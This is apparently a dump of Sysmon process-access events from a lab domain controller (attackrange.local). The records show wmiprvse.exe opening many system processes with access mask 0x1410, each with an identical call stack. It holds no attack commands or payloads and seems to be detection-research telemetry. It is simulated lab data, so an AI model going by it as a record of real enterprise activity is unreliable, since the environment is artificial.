15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023767Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023766Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023765Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023764Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023763Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023762Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023761Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023760Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023759Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023758Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023757Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023756Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023755Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023754Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023753Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023752Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023751Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023750Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023749Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023748Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 